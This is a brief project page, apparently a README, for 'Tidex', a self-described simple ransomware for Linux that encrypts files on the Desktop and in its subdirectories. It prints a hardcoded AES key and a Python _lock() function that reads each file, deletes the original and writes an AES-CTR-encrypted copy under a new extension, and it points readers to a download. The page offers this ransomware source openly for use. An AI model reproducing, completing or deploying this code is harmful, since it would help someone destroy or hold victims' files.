Tidex
Simple little Ransomware, only works to encrypt files in the directory path Desktop and subdirectories.
Â
Important
At the moment it can only be executed on Linux machines. it lacks decryption function. The KEY is: hkpykiiqftupr3okl04azj
Â
Code Example
python1def _lock(): 2 for files in all_Ext: 3 for _dotFile in glob.glob(files): 4 print(_dotFile) 5 f = open(f'{__dir()}/{_dotFile}', 'rb') 6 dataArr = f.read() 7 f.close() 8 os.remove(f'{__dir()}/{_dotFile}') 9 key = "hkpykiiqftupr3okl04azj" 10 aes = pyaes.AESModeOfOperationCTR(key) 11 EncryptData = aes.encrypt(dataArr) 12 newArr = _dotFile.replace(char, "") + Ext 13 newArr = open(f'{newArr}', 'wb') 14 newArr.write(EncryptData) 15 newArr.close() 16
Dowload Here From GitHub
Thx ~ aiskoa.
